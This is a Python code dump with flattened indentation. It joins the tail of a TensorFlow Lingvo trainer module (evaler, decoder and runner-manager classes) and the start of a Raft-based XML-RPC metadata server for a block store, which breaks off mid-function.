class Evaler(base_runner.BaseRunner):
"""Evaler."""
def __init__(self, eval_type, *args, **kwargs):
super(Evaler, self).__init__(*args, **kwargs)
self._job_name = 'evaler_' + eval_type
self._output_name = 'eval_' + eval_type
self.params.is_eval = True
self._eval_dir = os.path.join(self._logdir, self._output_name)
if self._model_task_name:
self._eval_dir += '_' + str(self._model_task_name)
tf.gfile.MakeDirs(self._eval_dir)
self._eval_path = _GetSpecificCheckpoint(
self.params.task.eval.load_checkpoint_from)
self._summary_writer = self._CreateSummaryWriter(self._eval_dir)
self._should_report_metrics = self._job_name.startswith(
FLAGS.vizier_reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.Instantiate()
self._params = self._model.params
# Always create the same graph to make sure node names are always
# exactly the same.
self._model.ConstructFPropGraph()
self._model_task = self._model.GetTask(self._model_task_name)
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for eval models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
assert not self.enqueue_ops
self.checkpointer = checkpointer.Checkpointer(self._train_dir,
self._model)
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._eval_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.train.write_graph(self._graph.as_graph_def(), self._eval_dir,
'%s.pbtxt' % self._output_name)
def Start(self):
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
"""The main loop."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
if self._eval_path:
self._EvalOnce(self._eval_path, sess)
else:
path = None
while True:
path = self._FindNewCheckpoint(path, sess)
if not path or self._EvalOnce(path, sess):
break
# Maybe evaluate the last checkpoint if we are not given a specific
# checkpoint to evaluate.
if self._eval_path is None:
self.EvalLatestCheckpoint(path)
if self._should_report_metrics:
self._trial.ReportDone()
tf.logging.info('Evaluation finished.')
def EvalLatestCheckpoint(self, last_path=None):
"""Runs eval once on the latest checkpoint."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already evaluated.')
return
self._EvalOnce(path, sess)
def _EvalOnce(self, path, sess):
"""Runs evaluation for a batch of samples.
Args:
path: checkpoint path.
sess: the tf Session.
Returns:
should_stop.
"""
if not FLAGS.evaler_in_same_address_as_controller:
self.checkpointer.RestoreFromPath(sess, path)
global_step = sess.run(py_utils.GetGlobalStep())
    # Skip the evaluation entirely if this checkpoint was saved before
    # start_eval_after steps.
if global_step < self._model_task.params.eval.start_eval_after:
return False
metrics_dict = {
name: metrics.AverageMetric() for name in self._model_task.eval_metrics
}
num_samples_metric = metrics_dict['num_samples_in_batch']
while (num_samples_metric.total_value <
self._model_task.params.eval.samples_per_summary):
# NOTE: We intentionally do not let FProp generate summaries by default,
# because evaler calls FProp multiple times for each checkpoint. Multiple
# summaries at the same step is often confusing. Instead, models should
# update eval_metrics and generate aggregate summaries.
ans = sess.run(self._model_task.eval_metrics)
for name, (value, weight) in six.iteritems(ans):
metrics_dict[name].Update(value, weight)
tf.logging.info('Total examples done: %d/%d',
num_samples_metric.total_value,
self._model_task.params.eval.samples_per_summary)
# Replace average values with total values for certain metrics.
if 'num_predictions' in metrics_dict:
metrics_dict['num_predictions'].total_weight = 1.0
if 'num_words' in metrics_dict:
metrics_dict['num_words'].total_weight = 1.0
# When we have evaluated so many samples, generate a summary.
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._eval_dir),
global_step, {k: v.Summary(k) for k, v in six.iteritems(metrics_dict)},
text_filename=os.path.join(self._eval_dir,
'score-{:08d}.txt'.format(global_step)))
should_stop = global_step >= self.params.train.max_steps
if self._should_report_metrics:
trial_should_stop = self._trial.ReportEvalMeasure(global_step,
metrics_dict, path)
should_stop = should_stop or trial_should_stop
return should_stop
def GetDecoderDir(logdir, decoder_type, model_task_name):
if model_task_name:
decoder_dir = '%s_%s' % (decoder_type, model_task_name)
else:
decoder_dir = decoder_type
return os.path.join(logdir, decoder_dir)
def _GetCheckpointIdForDecodeOut(checkpoint_path, global_step):
"""Retrieve the checkpoint id for the decoder out file.
Finds the checkpoint id in the checkpoint file name and compares to global
step. If they diverge, uses the retrieved id and prints a warning.
Args:
checkpoint_path: path to checkpoint file.
global_step: int specifying the global step of the model.
Returns:
Checkpoint id as int.
"""
ckpt_id_from_file = int(re.sub(r'.*ckpt-', '', checkpoint_path))
tf.logging.info('Loaded checkpoint is at global step: %d', global_step)
tf.logging.info('Checkpoint path: %s', checkpoint_path)
tf.logging.info('Checkpoint id according to checkpoint path: %d',
ckpt_id_from_file)
if global_step != ckpt_id_from_file:
tf.logging.warning(
'Checkpoint id %d != global step %d. '
'Will use checkpoint id from checkpoint file for '
'writing decoder output.', ckpt_id_from_file, global_step)
return ckpt_id_from_file
class Decoder(base_runner.BaseRunner):
"""Decoder."""
def __init__(self, decoder_type, *args, **kwargs):
super(Decoder, self).__init__(*args, **kwargs)
self._job_name = 'decoder_' + decoder_type
self.params.is_eval = True
self._decoder_dir = GetDecoderDir(self._logdir, self._job_name,
self._model_task_name)
tf.gfile.MakeDirs(self._decoder_dir)
self._decode_path = _GetSpecificCheckpoint(
self.params.task.eval.load_checkpoint_from)
self._summary_writer = self._CreateSummaryWriter(self._decoder_dir)
self._should_report_metrics = self._job_name.startswith(
FLAGS.vizier_reporting_job)
with self._graph.as_default(), tf.container(self._container_id):
with self._cluster, tf.device(self._cluster.GetPlacer()):
self._model = self.params.Instantiate()
self._params = self._model.params
self._model_task = self._model.GetTask(self._model_task_name)
# Note, different graphs are being constructed for different model
# tasks, which may result in different node names being chosen.
        # Obviously, variable names have to stay the same between train and
        # decode.
cluster = self._cluster
with tf.device(cluster.input_device):
input_batch = (
self._model_task.input_generator.GetPreprocessedInputBatch())
self._dec_output = self._model_task.Decode(input_batch)
self._summary_op = tf.summary.merge_all()
self.initialize_tables = tf.tables_initializer()
self._initialize_local_vars = tf.local_variables_initializer()
# No queues are allowed for decoder models.
self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS)
self.checkpointer = checkpointer.Checkpointer(self._train_dir,
self._model)
assert not self.enqueue_ops
# Saves the graph def.
self._WriteToLog(self.params.ToText(), self._decoder_dir, 'params.txt')
if self.params.cluster.task == 0:
tf.train.write_graph(self._graph.as_graph_def(), self._decoder_dir,
'%s.pbtxt' % self._job_name)
def Start(self):
self._RunLoop(self._job_name, self._Loop)
def _Loop(self):
with tf.container(
self._container_id), self._GetSession(inline=False) as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
if self._decode_path:
self.DecodeCheckpoint(sess, self._decode_path)
else:
path = None
while True:
path = self._FindNewCheckpoint(path, sess)
if not path or self.DecodeCheckpoint(sess, path):
break
# Maybe decode the last checkpoint if we are not given a specific
# checkpoint to decode.
if self._decode_path is None:
self.DecodeLatestCheckpoint(path)
if self._should_report_metrics:
self._trial.ReportDone()
tf.logging.info('Decoding finished.')
@classmethod
def GetDecodeOutPath(cls, decoder_dir, checkpoint_id):
"""Gets the path to decode out file."""
out_dir = cls._GetTtlDir(decoder_dir, duration='7d')
return os.path.join(out_dir, 'decoder_out_%09d' % checkpoint_id)
def DecodeCheckpoint(self, sess, checkpoint_path):
"""Decodes `samples_per_summary` examples using `checkpoint_path`."""
p = self._model_task.params
ckpt_id_from_file = int(re.sub(r'.*ckpt-', '', checkpoint_path))
if ckpt_id_from_file < p.eval.start_decoder_after:
return False
samples_per_summary = p.eval.decoder_samples_per_summary
if not samples_per_summary:
samples_per_summary = p.eval.samples_per_summary
self.checkpointer.RestoreFromPath(sess, checkpoint_path)
global_step = sess.run(py_utils.GetGlobalStep())
dec_metrics = self._model_task.CreateDecoderMetrics()
if not dec_metrics:
tf.logging.info('Empty decoder metrics')
return
buffered_decode_out = []
num_examples_metric = dec_metrics['num_samples_in_batch']
start_time = time.time()
while num_examples_metric.total_value < samples_per_summary:
tf.logging.info('Fetching dec_output.')
fetch_start = time.time()
run_options = tf.RunOptions(report_tensor_allocations_upon_oom=False)
if self._summary_op is None:
# No summaries were collected.
dec_out = sess.run(self._dec_output, options=run_options)
else:
dec_out, summary = sess.run([self._dec_output, self._summary_op],
options=run_options)
self._summary_writer.add_summary(summary, global_step)
post_process_start = time.time()
tf.logging.info('Done fetching (%f seconds)' %
(post_process_start - fetch_start))
decode_out = self._model_task.PostProcessDecodeOut(dec_out, dec_metrics)
if decode_out:
buffered_decode_out.extend(decode_out)
tf.logging.info(
'Total examples done: %d/%d '
'(%f seconds decode postprocess)', num_examples_metric.total_value,
samples_per_summary,
time.time() - post_process_start)
summaries = {k: v.Summary(k) for k, v in six.iteritems(dec_metrics)}
elapsed_secs = time.time() - start_time
example_rate = num_examples_metric.total_value / elapsed_secs
summaries['examples/sec'] = metrics.CreateScalarSummary(
'examples/sec', example_rate)
self._WriteSummaries(
self._summary_writer,
os.path.basename(self._decoder_dir),
global_step,
summaries,
text_filename=os.path.join(self._decoder_dir,
'score-{:08d}.txt'.format(global_step)))
self._ExportMetrics(
decode_checkpoint=global_step,
dec_metrics=dec_metrics,
example_rate=example_rate)
# global_step and the checkpoint id from the checkpoint file might be
# different. For consistency of checkpoint filename and decoder_out
# file, use the checkpoint id as derived from the checkpoint filename.
checkpoint_id = _GetCheckpointIdForDecodeOut(checkpoint_path, global_step)
decode_out_path = self.GetDecodeOutPath(self._decoder_dir, checkpoint_id)
decode_finalize_args = base_model.DecodeFinalizeArgs(
decode_out_path=decode_out_path, decode_out=buffered_decode_out)
self._model_task.DecodeFinalize(decode_finalize_args)
should_stop = global_step >= self.params.train.max_steps
if self._should_report_metrics:
trial_should_stop = self._trial.ReportEvalMeasure(global_step,
dec_metrics,
checkpoint_path)
should_stop = should_stop or trial_should_stop
return should_stop
def DecodeLatestCheckpoint(self, last_path=None):
"""Runs decoder on the latest checkpoint."""
with tf.container(self._container_id), self._GetSession() as sess:
# This initializes local tables
sess.run(self.initialize_tables)
# This initializes local variables.
sess.run(self._initialize_local_vars)
path = tf.train.latest_checkpoint(self._train_dir)
if not path:
tf.logging.info('No checkpoint available.')
return
elif path == last_path:
tf.logging.info('Latest checkpoint was already decoded.')
return
self.DecodeCheckpoint(sess, path)
def _GetClusterSpecDict():
"""Parses the cluster_spec flag and returns a dict."""
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = {}
for job_spec in job_specs:
# ps_host=worker1:1231,worker2:1234
job_machines = job_spec.split('=')
if len(job_machines) != 2:
      raise ValueError('Invalid job specification: %s' % job_spec)
cluster_spec_dict[job_machines[0]] = job_machines[1].split(',')
return cluster_spec_dict
class RunnerManager(object):
"""Helper class for managing runners."""
  # This is a hack so these classes can be overridden with internal
# non-public implementations.
# pylint: disable=invalid-name
inference_graph_exporter = inference_graph_exporter
model_registry = model_registry
Controller = Controller
Trainer = Trainer
TrainerTpu = TrainerTpu
Evaler = Evaler
Decoder = Decoder
ExecutorTpu = executor.ExecutorTpu
# pylint: enable=invalid-name
def __init__(self, model):
self._model_name = model
def MaybeLaunchTensorFlow(self):
"""Starts TF machinary in this process."""
if FLAGS.run_locally:
return
tf.logging.info('Launching tensorflow.')
target = FLAGS.tf_master
if not target.startswith('localhost'):
# E.g., trainer_client is configured w/ FLAGS.tf_master pointing to
# another job. In that case, start a local server.
cluster_spec_dict = _GetClusterSpecDict()
self._tf_server = tf.train.Server(
tf.train.ClusterSpec(cluster_spec_dict),
job_name=FLAGS.job,
task_index=FLAGS.task)
target = self._tf_server.target
if not FLAGS.tf_master:
FLAGS.tf_master = target
with tf.Session(target).as_default():
value = (tf.constant(1.) + tf.constant(1.)).eval()
assert value == 2.0, 'Something is really wrong.'
tf.logging.info('Launched tensorflow.')
def GetParamsForDataset(self, job_name, dataset_name):
"""Returns params for job `job_name` on the dataset `dataset_name`."""
# Get the current cluster and update its params from flags.
cluster = cluster_factory.Current()
self.UpdateClusterParamsFromFlags(cluster.params, job_name)
with cluster_factory.Cluster(cluster.params):
try:
cfg = self.model_registry.GetParams(self._model_name, dataset_name)
except base_model_params.DatasetError as e:
dataset_name_retry = dataset_name.title()
tf.logging.warning(
'Exception configuring dataset %s, retrying as %s: %s',
dataset_name, dataset_name_retry, e)
cfg = self.model_registry.GetParams(self._model_name,
dataset_name_retry)
tf.logging.warning('Succeeded after retrying as %s.' %
dataset_name_retry)
cfg.cluster = cluster.params
# Updates a few params based on flags.
if FLAGS.enqueue_max_steps:
cfg.train.enqueue_max_steps = FLAGS.enqueue_max_steps
if FLAGS.saver_max_to_keep:
cfg.train.save_max_to_keep = FLAGS.saver_max_to_keep
if FLAGS.saver_keep_checkpoint_every_n_hours:
cfg.train.save_keep_checkpoint_every_n_hours = FLAGS.saver_keep_checkpoint_every_n_hours
return cfg
def GetProgramScheduleParams(self, job_name, dataset_names):
"""Returns ProgramSchedule params for job `job_name` and datasets `dataset_name`."""
# Get the current cluster and update its params from flags.
cluster = cluster_factory.Current()
self.UpdateClusterParamsFromFlags(cluster.params, job_name)
with cluster_factory.Cluster(cluster.params):
ps_cfg, model_cfg_dict = self.model_registry.GetProgramSchedule(
self._model_name, dataset_names)
for v in model_cfg_dict.values():
v.cluster = cluster.params
return ps_cfg, model_cfg_dict
def MaybeConfigRunDistributed(self):
"""If given a `FLAGS.cluster_spec`, update flags for running distributed."""
if not FLAGS.cluster_spec:
return
job_specs = FLAGS.cluster_spec.split('@')
cluster_spec_dict = _GetClusterSpecDict()
if FLAGS.job == 'trainer_client':
FLAGS.tf_master = 'grpc://%s' % cluster_spec_dict['worker'][FLAGS.task]
for job in cluster_spec_dict.keys():
if job.startswith('decoder_'):
assert len(job_specs) == 1, 'Decoder jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.decoder_job = '/job:%s' % job
FLAGS.decoder_replicas = 1
if job.startswith('evaler_'):
assert len(job_specs) == 1, 'Evaler jobs must run on their own'
assert ',' not in job_specs[0], 'Only single machine supported'
FLAGS.evaler_job = '/job:%s' % job
FLAGS.evaler_replicas = 1
if FLAGS.mode == 'sync' and FLAGS.job in ('controller', 'trainer_client',
'worker', 'executor_tpu'):
FLAGS.worker_job = '/job:worker'
FLAGS.worker_replicas = len(cluster_spec_dict['worker'])
FLAGS.ps_job = '/job:worker'
FLAGS.ps_replicas = FLAGS.worker_replicas
if FLAGS.mode == 'async' and FLAGS.job in ('controller', 'trainer', 'ps'):
FLAGS.worker_job = '/job:trainer'
FLAGS.worker_replicas = len(cluster_spec_dict['trainer'])
FLAGS.ps_job = '/job:ps'
FLAGS.ps_replicas = len(cluster_spec_dict['ps'])
def MaybeConfigCloudTpu(self):
"""If given `FLAGS.tpu`, update flags for running on a Cloud TPU."""
if not FLAGS.tpu:
return
cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
tpu=FLAGS.tpu,
project=FLAGS.gcp_project,
zone=FLAGS.tpu_zone,
coordinator_name='trainer_client',
coordinator_address='localhost:0')
cluster_spec_dict = cluster_resolver.cluster_spec().as_dict()
FLAGS.job = 'trainer_client'
FLAGS.tf_master = cluster_resolver.master()
FLAGS.worker_job = '/job:worker'
FLAGS.worker_replicas = 1
FLAGS.worker_num_tpu_hosts = len(cluster_spec_dict['worker'])
FLAGS.worker_tpus = (
cluster_resolver.num_accelerators()['TPU'] * FLAGS.worker_num_tpu_hosts)
FLAGS.ps_job = FLAGS.worker_job
FLAGS.ps_replicas = FLAGS.worker_replicas
FLAGS.cluster_spec = ('@'.join(
'{}={}'.format(job, ','.join(hosts))
        for job, hosts in six.iteritems(cluster_spec_dict)))
FLAGS.xla_device = 'tpu'
FLAGS.enable_asserts = False
FLAGS.checkpoint_in_trainer_tpu = True
def UpdateClusterParamsFromFlags(self, cluster, job_name):
"""Update `cluster` with a training cluster configuration from flags."""
cluster.mode = FLAGS.mode
cluster.job = job_name
cluster.task = FLAGS.task
cluster.logdir = FLAGS.logdir
cluster.controller.name = FLAGS.controller_job
cluster.controller.gpus_per_replica = FLAGS.controller_gpus
cluster.worker.name = FLAGS.worker_job
cluster.worker.replicas = FLAGS.worker_replicas
cluster.worker.gpus_per_replica = FLAGS.worker_gpus
cluster.worker.tpus_per_replica = FLAGS.worker_tpus
cluster.worker.num_tpu_hosts = FLAGS.worker_num_tpu_hosts
cluster.worker.devices_per_split = FLAGS.worker_split_size
if FLAGS.tpu:
job_name = cluster.worker.name.replace('/job:', '', 1)
worker_hosts = _GetClusterSpecDict()[job_name]
cluster.worker.targets = ','.join(worker_hosts)
cluster.ps.name = FLAGS.ps_job
cluster.ps.replicas = FLAGS.ps_replicas
cluster.ps.gpus_per_replica = FLAGS.ps_gpus
cluster.input.name = FLAGS.input_job
cluster.input.replicas = FLAGS.input_replicas
cluster.input.targets = FLAGS.input_targets
cluster.evaler.name = FLAGS.evaler_job
cluster.evaler.replicas = FLAGS.evaler_replicas
cluster.evaler.gpus_per_replica = FLAGS.evaler_gpus
cluster.decoder.name = FLAGS.decoder_job
cluster.decoder.replicas = FLAGS.decoder_replicas
cluster.decoder.gpus_per_replica = FLAGS.decoder_gpus
def _CreateRunner(self, job, model_task_name, logdir, tf_master, trial):
"""Create a runner."""
evaler_job_name_prefix = 'evaler_'
decoder_job_name_prefix = 'decoder_'
tf.logging.info('Job %s start', job)
common_args = (model_task_name, logdir, tf_master, trial)
if job == 'controller':
cfg = self.GetParamsForDataset('controller', 'Train')
return self.Controller(cfg, *common_args)
elif job == 'trainer':
cfg = self.GetParamsForDataset('trainer', 'Train')
return self.Trainer(cfg, *common_args)
elif job == 'trainer_client':
cfg = self.GetParamsForDataset('trainer_client', 'Train')
if py_utils.use_tpu():
return self.TrainerTpu(cfg, *common_args)
else:
return self.Trainer(cfg, *common_args)
elif job.startswith(evaler_job_name_prefix):
dataset_name = job[len(evaler_job_name_prefix):]
cfg = self.GetParamsForDataset('evaler', dataset_name)
return self.Evaler(dataset_name.lower(), cfg, *common_args)
elif job.startswith(decoder_job_name_prefix):
dataset_name = job[len(decoder_job_name_prefix):]
cfg = self.GetParamsForDataset('decoder', dataset_name)
return self.Decoder(dataset_name.lower(), cfg, *common_args)
elif job in ('ps', 'worker', 'input'):
      self._tf_server.join()
    elif job == 'executor_tpu':
      # TODO(blee): Fix the instantiation of ExecutorTpu
program_schedule, task_dict = self.GetProgramScheduleParams(
'executor_tpu', ['Train', 'Test'])
return self.ExecutorTpu(task_dict, program_schedule, model_task_name,
logdir, tf_master)
else:
raise ValueError('job %s is not supported' % job)
def CreateRunners(self, jobs, logdir, trial=base_trial.NoOpTrial()):
"""Creates a list of runners based on `FLAGS.mode`.
Args:
jobs: a list of runner jobs.
logdir: the directory used for logging, usually on CNS.
trial: optional `Trial` object, used for reporting measures and early
stopping.
Returns:
A list of `.BaseRunner`, one per job in `jobs`.
"""
runners = []
for j in jobs:
tf_master = FLAGS.tf_master
# Ensure that decoder or evaler threads do not clobber variables being
# updated by trainer by forcing them to use independent sessions.
if ('trainer' in jobs and
(j.startswith('decoder') or j.startswith('evaler'))):
tf_master = ''
runner = self._CreateRunner(j, FLAGS.model_task_name, logdir, tf_master,
trial)
runners.append(runner)
return runners
def StartRunners(self, runners):
"""Runs `runners` in parallel threads.
Returns when all of them finish.
Args:
runners: a list of `.BaseRunner`.
Returns:
None.
"""
threads = []
tf.logging.info('Starting runners')
for runner in runners:
t = threading.Thread(target=runner.Start)
t.daemon = True
t.start()
threads.append(t)
if runner.enqueue_ops:
tf.logging.info('Total num runner.enqueue_ops: %d',
len(runner.enqueue_ops))
for enqueue_op in runner.enqueue_ops:
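          # Bind (runner, op) through a factory function so that each thread
          # gets its own closure; a bare lambda here would capture the loop
          # variables by reference and every thread would see the last values.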
def StartEnqueue(runner, op):
tf.logging.info('Starting enqueue op %s', op.name)
return lambda: runner.StartEnqueueOp(op)
tq = threading.Thread(target=StartEnqueue(runner, enqueue_op))
tq.start()
threads.append(tq)
tf.logging.info('Waiting for runners to finish...')
for t in threads:
while True:
t.join(1)
        if not t.is_alive():
break
tf.logging.info('All runners done.')
def RunTrial(self, job, logdir, trial):
"""A wrapper function for running a trial."""
if job == 'all':
# For async mode: Run controller, trainer, evaler jobs in one process,
# multiple threads.
self.StartRunners(
self.CreateRunners(['controller', 'trainer'], logdir, trial))
evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir,
FLAGS.tf_master, trial)
evaler.EvalLatestCheckpoint()
elif job == 'all_sync':
# For sync mode: Run controller, trainer_client, evaler jobs in one
# process, multiple threads.
self.StartRunners(
self.CreateRunners(['controller', 'trainer_client'], logdir, trial))
evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir,
FLAGS.tf_master, trial)
evaler.EvalLatestCheckpoint()
else:
# Run each job in separate process/task
# TODO(rpang): add support for running evaler_test and decoder.
self.StartRunners(self.CreateRunners([job], logdir, trial))
def MaybeConfigRunLocally(self):
"""Update flags if configured to run locally."""
if not FLAGS.run_locally:
# Do nothing
return
FLAGS.tf_master = tf.train.Server.create_local_server().target
if not FLAGS.mode:
FLAGS.mode = 'sync'
if not FLAGS.job:
if FLAGS.run_locally == 'tpu':
FLAGS.job = 'trainer_client'
else:
FLAGS.job = 'controller,trainer_client'
FLAGS.task = 0
FLAGS.controller_job = '/job:local'
FLAGS.worker_job = '/job:local'
FLAGS.worker_replicas = 1
if FLAGS.run_locally == 'gpu':
if not FLAGS.worker_gpus:
FLAGS.worker_gpus = 1
else:
FLAGS.worker_gpus = 0
if FLAGS.run_locally == 'tpu':
FLAGS.xla_device = 'tpu'
FLAGS.enable_asserts = False
else:
FLAGS.worker_tpus = 0
if not FLAGS.worker_split_size:
FLAGS.worker_split_size = 1
FLAGS.ps_job = '/job:local'
FLAGS.ps_replicas = 1
FLAGS.ps_gpus = 0
FLAGS.input_job = '/job:local'
FLAGS.input_replicas = 0
FLAGS.evaler_job = '/job:local'
FLAGS.evaler_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.evaler_gpus = 1
else:
FLAGS.evaler_gpus = 0
FLAGS.decoder_job = '/job:local'
FLAGS.decoder_replicas = 1
if FLAGS.run_locally == 'gpu':
FLAGS.decoder_gpus = 1
else:
FLAGS.decoder_gpus = 0
def InspectModel(self):
"""Prints out model analysis for the model."""
FLAGS.mode = 'sync'
p = self.GetParamsForDataset('controller', 'Train')
c = cluster_factory.Cluster(p.cluster)
with tf.Graph().as_default(), c, tf.device(c.GetPlacer()):
analysis, _ = _ModelAnalysis(p.Instantiate())
print(analysis)
def InspectDatasets(self):
"""Prints out datasets configured for the model."""
cls = self.model_registry.GetClass(self._model_name)
datasets = []
for name, _ in inspect.getmembers(cls, inspect.ismethod):
if name not in ['GetDatasetParams', 'Model', 'Task', 'ProgramSchedule'
] and not name.startswith('_'):
datasets += [name]
print(','.join([_.lower() for _ in datasets]))
def InspectDecoder(self):
"""Prints out datasets configured for the decoder."""
cls = self.model_registry.GetClass(self._model_name)
has_decoder = False
if issubclass(cls, base_model_params.SingleTaskModelParams):
has_decoder = cls.Task(
).cls.CreateDecoderMetrics != base_model.BaseTask.CreateDecoderMetrics
else:
for _, task_param in cls.Model().task_params.IterParams():
has_decoder |= (
task_param.cls.CreateDecoderMetrics !=
base_model.BaseTask.CreateDecoderMetrics)
if has_decoder:
# We assume that the proper decoder is implemented.
self.InspectDatasets()
else:
print('')
def WriteInferenceGraph(self):
"""Generates the inference graphs for a given model."""
inference_graph_dir = os.path.join(FLAGS.logdir, 'inference_graphs')
tf.gfile.MakeDirs(inference_graph_dir)
tf.logging.info('Writing inference graphs to dir: %s', inference_graph_dir)
cfg = self.model_registry.GetParams(self._model_name, 'Test')
if (issubclass(cfg.cls, base_model.MultiTaskModel) and
not FLAGS.model_task_name):
tf.logging.info('Cannot write inference graphs for multi-task model '
'when model_task_name is not specified.')
return
try:
filename_prefix = 'inference'
if FLAGS.model_task_name:
filename_prefix = '%s_inference' % FLAGS.model_task_name
filename_prefix = os.path.join(inference_graph_dir, filename_prefix)
# Standard inference graph.
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=FLAGS.model_task_name,
export_path=filename_prefix + '.pbtxt')
except NotImplementedError as e:
tf.logging.error('Cannot write inference graph: %s', e)
# TPU inference graph. Not all models support it so fail silently.
try:
self.inference_graph_exporter.InferenceGraphExporter.Export(
model_cfg=cfg,
model_task_name=FLAGS.model_task_name,
device_options=self.inference_graph_exporter.InferenceDeviceOptions(
device='tpu',
retain_device_placement=False,
var_options='ON_DEVICE',
gen_init_op=True,
dtype_override=None),
export_path=filename_prefix + '_tpu.pbtxt')
except Exception as e: # pylint: disable=broad-except
tf.logging.info('Error exporting TPU inference graph: %s' % e)
def Start(self):
"""Start the process."""
tf.logging.set_verbosity(tf.logging.INFO)
assert self.model_registry.GetClass(
self._model_name), ('Model %s is not found.' % FLAGS.model)
if FLAGS.mode == 'inspect_model':
self.InspectModel()
return
if FLAGS.mode == 'inspect_evaler':
self.InspectDatasets()
return
if FLAGS.mode == 'inspect_decoder':
self.InspectDecoder()
return
if FLAGS.mode == 'write_inference_graph':
self.WriteInferenceGraph()
return
if FLAGS.mode == 'shell':
_StartShell(locals())
return
assert FLAGS.mode in ['sync', 'async']
self.MaybeConfigRunLocally()
self.MaybeConfigRunDistributed()
self.MaybeConfigCloudTpu()
self.MaybeLaunchTensorFlow()
self.StartRunners(self.CreateRunners(FLAGS.job.split(','), FLAGS.logdir))
def main(unused_argv):
# pylint: disable=g-import-not-at-top
# pylint: disable=unused-variable
from lingvo import model_imports
RunnerManager(FLAGS.model).Start()
if __name__ == '__main__':
tf.app.run(main)
|
server.py
|
import argparse
import sched
import xmlrpc.client
from hashlib import sha256
from random import randrange
from socketserver import ThreadingMixIn
from threading import Thread
from time import time, sleep
from xmlrpc.server import SimpleXMLRPCRequestHandler
from xmlrpc.server import SimpleXMLRPCServer
class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)
class threadedXMLRPCServer(ThreadingMixIn, SimpleXMLRPCServer):
pass
FileInfoMap = {}
blocks = {}
serverNum = -1
servers = []
currentTerm = 0
votedFor = -1
log = []
commitIndex = -1
lastApplied = -1
matchIndex = []
FOLLOWER = 0
CANDIDATE = 1
LEADER = 2
CRASHED = 3
timer = 0
state = FOLLOWER
timeout = randrange(400, 700) / 1000
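# The election timeout is randomized (as in Raft) so that followers do not all
# time out and start elections at the same moment.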
# A simple ping, returns true
def ping():
"""A simple ping method"""
print("Ping()")
return True
# Gets a block, given a specific hash value
def getblock(h):
"""Gets a block"""
print("GetBlock(" + h + ")")
if h in blocks:
blockData = blocks[h]
return blockData
else:
print("block not found")
# Puts a block
def putblock(b):
"""Puts a block"""
print("PutBlock()")
blocks[sha256(b.data).hexdigest()] = b
return True
# Given a list of blocks, return the subset that are on this server
def hasblocks(blocklist):
"""Determines which blocks are on this server"""
print("HasBlocks()")
return list(filter(lambda x: x in blocks, blocklist))
# Retrieves the server's FileInfoMap
def getfileinfomap():
"""Gets the fileinfo map"""
print("GetFileInfoMap()")
return FileInfoMap
def toFollower(term):
global currentTerm, state, timer, votedFor
state = FOLLOWER
currentTerm = term
votedFor = -1
timer = time()
def replicate(serverId, successes):
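    # Retry AppendEntries against this follower until either it acknowledges
    # the entry or a majority of the cluster (tracked via the shared
    # `successes` counter) has replicated it; RPCs are only issued while this
    # node still believes it is the leader.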
while successes[0] + 1 <= (len(servers) + 1) / 2:
if state == LEADER:
try:
term, success = servers[serverId].surfstore.appendEntries(currentTerm, log, commitIndex)
# print(serverId, log)
if success:
successes[0] += 1
matchIndex[serverId] = len(log) - 1
break
elif term != -1:
raise Exception('replicate failed')
if term > currentTerm:
toFollower(term)
except Exception as e:
print(str(e))
# Update a file's fileinfo entry
def updatefile(filename, version, blocklist):
    """Updates a file's fileinfo entry"""
    global commitIndex
if state != LEADER or state == CRASHED:
raise Exception("not leader or crashed")
print("UpdateFile()")
if filename in FileInfoMap:
v = FileInfoMap[filename][0]
if blocklist == "0" and FileInfoMap[filename][1] == "0":
return v
elif version != v + 1:
print("version too old")
return False
successes = [0]
entry = (currentTerm, (filename, version, blocklist))
log.append(entry)
for i in range(len(servers)):
th = Thread(target=replicate, args=(i, successes))
th.start()
while successes[0] + 1 <= (len(servers) + 1) / 2:
if state == CRASHED:
return 0
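    # A majority has acknowledged the entry: commit it and apply it to the
    # local FileInfoMap.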
commitIndex += 1
FileInfoMap[filename] = (version, blocklist)
sleep(0.5)
return version
# PROJECT 3 APIs below
# Queries whether this metadata store is a leader
# Note that this call should work even when the server is "crashed"
def isLeader():
"""Is this metadata store a leader?"""
print("IsLeader()")
return state == LEADER
# "Crashes" this metadata store
# Until Restore() is called, the server should reply to all RPCs
# with an error (unless indicated otherwise), and shouldn't send
# RPCs to other servers
def crash():
"""Crashes this metadata store"""
global state
print("Crash()")
state = CRASHED
return True
# "Restores" this metadata store, allowing it to start responding
# to and sending RPCs to other nodes
def restore():
"""Restores this metadata store"""
global state, timer
print("Restore()")
state = FOLLOWER
timer = time()
return True
# "IsCrashed" returns the status of this metadata node (crashed or not)
# This method should always work, even when the node is crashed
def isCrashed():
"""Returns whether this node is crashed or not"""
print("IsCrashed()")
return state == CRASHED
# Requests vote from this server to become the leader
def requestVote(term, candidateId, lastLogIndex, lastLogTerm):
"""Requests vote to be the leader"""
    global timer, currentTerm, state, votedFor
if state == CRASHED:
return -1, False
res = False
if currentTerm < term:
